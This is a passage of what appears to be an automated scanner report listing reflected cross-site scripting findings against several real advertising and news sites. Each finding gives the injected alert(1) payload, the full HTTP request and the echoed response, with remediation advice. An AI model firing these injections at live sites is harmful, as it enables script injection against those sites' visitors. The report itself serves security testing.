ginalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25e61d7"-alert(1)-"7cb16570519&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws
...[SNIP]...

1.286. http://delivery.steelhousemedia.com/serve [segid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the segid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90598"-alert(1)-"205e5f5ee5b was submitted in the segid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=090598"-alert(1)-"205e5f5ee5b&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:26 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:26 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=090598"-alert(1)-"205e5f5ee5b&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QD
...[SNIP]...

1.287. http://delivery.steelhousemedia.com/serve [sh_rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the sh_rid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9b52"-alert(1)-"9895b7aae73 was submitted in the sh_rid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796c9b52"-alert(1)-"9895b7aae73&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:33 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:33 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796c9b52"-alert(1)-"9895b7aae73&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgK
...[SNIP]...

1.288. http://feed2js.org//feed2js.php [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed2js.org
Path:   //feed2js.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4608'%3balert(1)//69b0a0eb3dd was submitted in the src parameter. This input was echoed as e4608';alert(1)//69b0a0eb3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //feed2js.php?src=http%3A%2F%2Ffeeds.feedburner.com%2FGlobalEconomicIntersection-NewsBloge4608'%3balert(1)//69b0a0eb3dd&num=4&targ=y&html=a HTTP/1.1
Host: feed2js.org
Proxy-Connection: keep-alive
Referer: http://econintersect.com/news_summary.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-type: text/html
Date: Tue, 28 Jun 2011 01:23:18 GMT
Server: lighttpd/1.4.19
Content-Length: 819

document.write('<div class="rss-box">');
document.write('<p class="rss-item"><em>Error:</em> Feed failed! Causes may be (1) No data found for RSS feed http://feeds.feedburner.com/GlobalEconomicIntersection-NewsBloge4608';alert(1)//69b0a0eb3dd; (2) There are no items are available for this feed; (3) The RSS feed does not validate.<br />
...[SNIP]...

1.289. http://feed2js.org//feed2js.php [targ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed2js.org
Path:   //feed2js.php

Issue detail

The value of the targ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7244d'%3balert(1)//960b5724d50 was submitted in the targ parameter. This input was echoed as 7244d';alert(1)//960b5724d50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //feed2js.php?src=http%3A%2F%2Ffeeds.feedburner.com%2FGlobalEconomicIntersection-NewsBlog&num=4&targ=y7244d'%3balert(1)//960b5724d50&html=a HTTP/1.1
Host: feed2js.org
Proxy-Connection: keep-alive
Referer: http://econintersect.com/news_summary.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Content-type: application/x-javascript
Date: Tue, 28 Jun 2011 01:23:18 GMT
Server: lighttpd/1.4.19
Content-Length: 8691

feed2js_ck = true;

document.write('<div class="rss-box">');
document.write('<ul class="rss-items">');
document.write('<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/GlobalEconomicIntersection-NewsBlog/~3/t1UrAiUKpu0/midwest-manufacturing-index-gains-in-may-2011" target="y7244d';alert(1)//960b5724d50">
...[SNIP]...

1.290. http://financial.businessinsider.com/siliconalleymedia [Account parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financial.businessinsider.com
Path:   /siliconalleymedia

Issue detail

The value of the Account request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf7a2'-alert(1)-'365b1f4a67f was submitted in the Account parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /siliconalleymedia?Account=clusterstockbf7a2'-alert(1)-'365b1f4a67f&Module=snapshot2&Output=JS HTTP/1.1
Host: financial.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/partner/fc/iframe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1000416789-1305981192638; __utmz=242410385.1305981199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VWCUKP300=L123100/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1; __utma=242410385.1810873402.1305981199.1306496226.1306518645.3; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2361|Q_2360|Q_2358|Q_2347|Q_1659|Q_1213|Q_1154|Q_1153|Q_1151|Q_1150|Q_1145|Q_982; _vaTC=uuid=be274efe-a661-474b-828e-30f6a1ac46ff&cId=2UO6jb&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1309224154370; _vaHC=holdout=false

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:22:58 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 28 Jun 2011 01:22:58 GMT
Expires: Tue, 28 Jun 2011 01:23:58 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 45117

document.write('<style>\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fc * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n');
document.write(' margin:
...[SNIP]...
rc='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinancial.businessinsider.com%2Fsiliconalleymedia%3FHTTP_HOST%3Dfinancial.businessinsider.com%26HTTPS%3Doff%26Account%3Dclusterstockbf7a2'-alert(1)-'365b1f4a67f%26Module%3Dsnapshot2%26Output%3DJS&Type=widget&Client=siliconalleymedia.clusterstockbf7a2-alert(1)-365b1f4a67f&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ
...[SNIP]...

1.291. http://financial.businessinsider.com/siliconalleymedia [Module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financial.businessinsider.com
Path:   /siliconalleymedia

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90146'-alert(1)-'e8742d17e0e was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /siliconalleymedia?Account=clusterstock&Module=snapshot290146'-alert(1)-'e8742d17e0e&Output=JS HTTP/1.1
Host: financial.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/partner/fc/iframe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1000416789-1305981192638; __utmz=242410385.1305981199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VWCUKP300=L123100/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1; __utma=242410385.1810873402.1305981199.1306496226.1306518645.3; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2361|Q_2360|Q_2358|Q_2347|Q_1659|Q_1213|Q_1154|Q_1153|Q_1151|Q_1150|Q_1145|Q_982; _vaTC=uuid=be274efe-a661-474b-828e-30f6a1ac46ff&cId=2UO6jb&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1309224154370; _vaHC=holdout=false

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:01 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 28 Jun 2011 01:23:01 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 858


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinancial.businessinsider.com%2Fsiliconalleymedia%3FHTTP_HOST%3Dfinancial.businessinsider.com%26HTTPS%3Doff%26Account%3Dclusterstock%26Module%3Dsnapshot290146'-alert(1)-'e8742d17e0e%26Output%3DJS&Type=widget&Client=siliconalleymedia.clusterstock&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('he
...[SNIP]...

1.292. http://financial.businessinsider.com/siliconalleymedia [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financial.businessinsider.com
Path:   /siliconalleymedia

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d17b'-alert(1)-'fdd8e5477e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /siliconalleymedia5d17b'-alert(1)-'fdd8e5477e8?Account=clusterstock&Module=snapshot2&Output=JS HTTP/1.1
Host: financial.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/partner/fc/iframe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1000416789-1305981192638; __utmz=242410385.1305981199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VWCUKP300=L123100/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1; __utma=242410385.1810873402.1305981199.1306496226.1306518645.3; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2361|Q_2360|Q_2358|Q_2347|Q_1659|Q_1213|Q_1154|Q_1153|Q_1151|Q_1150|Q_1145|Q_982; _vaTC=uuid=be274efe-a661-474b-828e-30f6a1ac46ff&cId=2UO6jb&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1309224154370; _vaHC=holdout=false

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:03 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 28 Jun 2011 01:23:03 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 886


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinancial.businessinsider.com%2Fsiliconalleymedia5d17b'-alert(1)-'fdd8e5477e8%3FHTTP_HOST%3Dfinancial.businessinsider.com%26HTTPS%3Doff%26Account%3Dclusterstock%26Module%3Dsnapshot2%26Output%3DJS&Type=widget&Client=siliconalleymedia5d17b'-alert(1)-'fdd8e5477e8.clusterstock&rand
...[SNIP]...

1.293. http://financial.businessinsider.com/siliconalleymedia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financial.businessinsider.com
Path:   /siliconalleymedia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3d14'-alert(1)-'b27ae5ecb14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /siliconalleymedia?Account=clusterstock&Module=snapshot2&Output=JS&b3d14'-alert(1)-'b27ae5ecb14=1 HTTP/1.1
Host: financial.businessinsider.com
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/partner/fc/iframe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1000416789-1305981192638; __utmz=242410385.1305981199.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VWCUKP300=L123100/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1; __utma=242410385.1810873402.1305981199.1306496226.1306518645.3; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2361|Q_2360|Q_2358|Q_2347|Q_1659|Q_1213|Q_1154|Q_1153|Q_1151|Q_1150|Q_1145|Q_982; _vaTC=uuid=be274efe-a661-474b-828e-30f6a1ac46ff&cId=2UO6jb&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1309224154370; _vaHC=holdout=false

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:02 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 28 Jun 2011 01:23:02 GMT
Expires: Tue, 28 Jun 2011 01:24:02 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 44838

document.write('<style>\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fc * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n');
document.write(' margin:
...[SNIP]...
m/track.js?Source=http%3A%2F%2Ffinancial.businessinsider.com%2Fsiliconalleymedia%3FHTTP_HOST%3Dfinancial.businessinsider.com%26HTTPS%3Doff%26Account%3Dclusterstock%26Module%3Dsnapshot2%26Output%3DJS%26b3d14'-alert(1)-'b27ae5ecb14%3D1&Type=widget&Client=siliconalleymedia.clusterstock&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
v
...[SNIP]...

1.294. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e695b'-alert(1)-'e9d1fbe743 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=2KNwPQrX2z91kxgEVg7ZPwAAAKCZmfk_dZMYBFYO2T_Xo3A9CtfbP3nKMcyE9gQk_ayDGovBdy_QLglOAAAAAKNLAABlAQAAVgEAAAIAAAAY0QEAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCLwkBAgUCAQQAAAAAfCE2FwAAAAA.&tt_code=vert-4&udj=uf%28%27a%27%2C+5532%2C+1309224656%29%3Buf%28%27c%27%2C+27904%2C+1309224656%29%3Buf%28%27r%27%2C+119064%2C+1309224656%29%3B&cnd=!Ohz0wwiA2gEQmKIHGAAgvcgBMAE42j9AAEjWAlAAWABgVWgAcAB4AIABLIgB_qkBkAEBmAEBoAECqAEDsAEAuQEAAABQCtfbP8EBAAAAUArX2z_JATMzMzMzM_c_2QEAAAAAAADwP-ABAA..&ccd=!cwQeJAiA2gEQmKIHGL3IASAAe695b'-alert(1)-'e9d1fbe743&referrer=http://www.marketbuy54.com&pp=AAABMNPe3RfzcRm2qszMuLi2tMsp7C9vgcc6Sg&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsRHCMAwF0B8CnLmskVZcbMu2VLACO0QnUbMhI6RkHY7XvwUTgFVaj3BWYgkmVg2y0QvFyFrEeZOXJZyet_uxYP4P490seqUaMmh4U_Lcg4Sr59K0bhIJZ2A8Ei6YvnvCFXh_8ANNDTeZcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
